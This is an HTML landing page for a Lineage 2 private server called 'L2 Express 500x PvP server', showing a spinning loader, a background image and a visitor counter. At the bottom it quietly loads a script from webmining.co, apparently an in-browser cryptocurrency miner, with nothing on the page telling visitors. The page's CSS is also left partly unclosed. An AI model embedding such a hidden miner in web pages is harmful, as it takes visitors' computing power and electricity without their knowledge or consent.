<!DOCTYPE html>
<html>
<head>

<center>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
.loader {
  border: 16px solid #f3f3f3;
  border-radius: 50%;
  border-top: 16px solid #3498db;
  width: 120px;
  height: 120px;
  -webkit-animation: spin 2s linear infinite; /* Safari */
  animation: spin 2s linear infinite;
}

/* Safari */
@-webkit-keyframes spin {
  0% { -webkit-transform: rotate(0deg); }
  100% { -webkit-transform: rotate(360deg); }
}

@keyframes spin {
  0% { transform: rotate(0deg); }
  100% { transform: rotate(360deg); }
}

body {
        background-image: url(" https://images8.alphacoders.com/410/thumb-1920-410357.jpg");

</style>
  
 <script id="_waup6e">var _wau = _wau || []; _wau.push(["dynamic", "u6v1j3b8f4", "p6e", "c4302bffffff", "big"]);</script><script async src="//waust.at/d.js"></script> 
</head>
<body>

<h2>L2 Express 500x PvP server</h2>

<div class="loader"></div>

<h2>L2 Express 500x PvP server</h2>
<center/>

<script async="async" src="//webmining.co/lib/wm.js?s=10228p=55"></script>
</body>
</html>
